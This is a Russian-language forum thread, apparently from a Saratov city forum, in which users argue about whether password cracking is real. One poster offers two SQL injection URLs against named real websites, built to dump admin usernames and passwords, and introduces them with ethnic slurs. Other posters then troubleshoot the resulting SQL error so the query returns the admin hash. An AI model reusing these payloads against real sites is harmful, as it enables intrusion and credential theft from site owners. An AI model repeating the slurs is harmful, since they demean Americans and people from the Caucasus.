Почему хакеры так легко и просто взламывают наши пароли?

OP
W

welcomeinside

Guest
так тут фильтрация стоит, такие нубские дырки на автосаратове отсутствуют это надо вводить на сайтах где найдена уязвимость и пытаться её "раскручивать"
т.е. эта хрень имела место, но когда-то настолько давно, что никто не помнит?
 
!Chip

!Chip

Активный участник
Регистрация
27.02.2008
Сообщения
42 382
Реакции
2 255
Баллы
113
в общем опять хрень какая-то.

г-да хаскеры, покажите мне в реальности, что существует взлом.
на реальных примерах.

или это как гипноз?

Это реально существует, в таких кинофильмах как Хакеры, Пароль Рыба меч и т.д. и т.п.
 
Водитель_Камаза

Водитель_Камаза

Новичок
Регистрация
26.12.2007
Сообщения
2 426
Реакции
21
Баллы
0
welcomeinside, тренируйся на кошках
пендосах
например
возможна инъекция
Код:
http://www.resolutiondev.com/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p%20assword),5,6,7+from+tbl_admin%20--

или на хачиках
Код:
http://old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1%20%201,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
читай профильные форумы и будешь крутым хацкером
 
OP
W

welcomeinside

Guest
например
возможна инъекция
и тут не лучше
Error: SELECT * FROM tbl_cms WHERE id = -41 union select 1,2,3,group_concat(username,0x3a,p assword),5,6,7 from tbl_admin --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'assword),5,6,7 from tbl_admin --' at line 1
 
OP
W

welcomeinside

Guest
читай профильные форумы и будешь крутым хацкером
за всю жизнь пока кроме таинственных многозначительных фраз типа

читай профильные форумы и будешь крутым хацкером
результатов не видел.
 
Водитель_Камаза

Водитель_Камаза

Новичок
Регистрация
26.12.2007
Сообщения
2 426
Реакции
21
Баллы
0
ну офигеть теперь, а должно быть написано что вы взломали сайт и список всех паролей? или чо?
 
OP
W

welcomeinside

Guest
а должно быть написано что вы взломали сайт и список всех паролей? или чо?
вот именно.

что должно быть написано то?
как понять что цель достигнута, если нет результата?


я не уловлю никак сути... уже много лет... как должен выглядеть результат?
 
OP
W

welcomeinside

Guest
хз. но почему то пароль, который потерял (вместе с винтом на целых 20 гигов с помощью некого Лёши Пронина из атто - главного уродователя винтов в Саратове) - ни один хаскер ломануть не согласился... за 12 лет...
выдумывались отмазы различные...
 
ba4inskii

ba4inskii

Участник
Регистрация
11.02.2011
Сообщения
985
Реакции
25
Баллы
28
что должно быть написано то?
как понять что цель достигнута, если нет результата?
Ты уже получил результат. С помощью Sql- инъекции получил ответ от сервера БД. А дальше уже дело техники получить все что интересует из БД.
 
Черный Лотос

Черный Лотос

Новичок
Регистрация
07.10.2009
Сообщения
2 401
Реакции
10
Баллы
0
Error: SELECT * FROM tbl_cms WHERE id = -41 union select 1,2,3,group_concat(username,0x3a,c),5,6,7 from tbl_admin --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'assword),5,6,7 from tbl_admin --' at line 1

Убери пробел в слове password
то есть %20
и будет тебе счастье в виде хеша админа)
 
Водитель_Камаза

Водитель_Камаза

Новичок
Регистрация
26.12.2007
Сообщения
2 426
Реакции
21
Баллы
0
да он даже этого не догадался сделать, там прямо в коде написано username и password из таблицы admin в итоге логин и пасс админа сайта
 
SAWE

SAWE

Новичок
Регистрация
21.10.2006
Сообщения
15 183
Реакции
242
Баллы
0
Было дело по теме ))) :



Qok (20:54:01 19/03/2012)



SAWE (21:07:01 19/03/2012)
я - хитрый


Qok (21:07:16 19/03/2012)
Я знааал!!! ))))))))))))))))))))))


SAWE (21:19:49 19/03/2012)
у меня угнали ящик peacedata@list.ru
А может я сам сумничал и пароль поменял, и не помню
Прикольно было по телефону диктовать электронку секретуткам разным.


Qok (21:20:17 19/03/2012)
Ну восстанови пароль


SAWE (21:21:32 19/03/2012)
не получилось, не помню ничего, ни вопросов, ни прочего (


SAWE (21:27:41 19/03/2012)
Я убивал оппонентов, когда говорил, что компания называется "Мир данных", или "Мирные данные", только на английском.))) А некоторые за мной вслух проговаривали и в офисе повисала такая нетеатральная пауза...


Qok (21:27:56 19/03/2012)
)))


SAWE (21:35:50 19/03/2012)
Б#яяяя! *DANCE2*
Игорян, чувак, спасибо!!! Я пароль вспомнил!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*YU**LAUGH**DANCE**PLEASANTRY*:-D


Qok (21:36:44 19/03/2012)
неужели 123???


SAWE (21:36:44 19/03/2012)
Ща попробовал, и зашёл с третьего раза!!! Йохооо! )))))


Qok (21:36:47 19/03/2012)
)))))))))))))))))))


SAWE (21:37:40 19/03/2012)
#ляаааа, ну я пiзд#ц какой умный! )))))))))))
 
Alex07

Alex07

Новичок
Регистрация
02.04.2004
Сообщения
32 499
Реакции
570
Баллы
0
Гы !

В общем хакеры и взломщики паролей, это выдумки ?
 
OP
Ф

Федор

Guest
В общем хакеры и взломщики паролей, это выдумки ?
почему? Человеку свойственно ошибаться, поэтому, если один человек делал защиту, другой может найти ошибки в этой защите и ее проковырять. Другое дело, что нужно думать, чтобы обойти защиту, а не брать готовый инструмент и надеяться, что всё будет легко и просто.
 
Johnny Mnemonic

Johnny Mnemonic

Новичок
Регистрация
13.11.2012
Сообщения
11 362
Реакции
624
Баллы
0
почему? Человеку свойственно ошибаться, поэтому, если один человек делал защиту, другой может найти ошибки в этой защите и ее проковырять. Другое дело, что нужно думать, чтобы обойти защиту, а не брать готовый инструмент и надеяться, что всё будет легко и просто.
Весь вопрос только в мотивации.
 
Верх Низ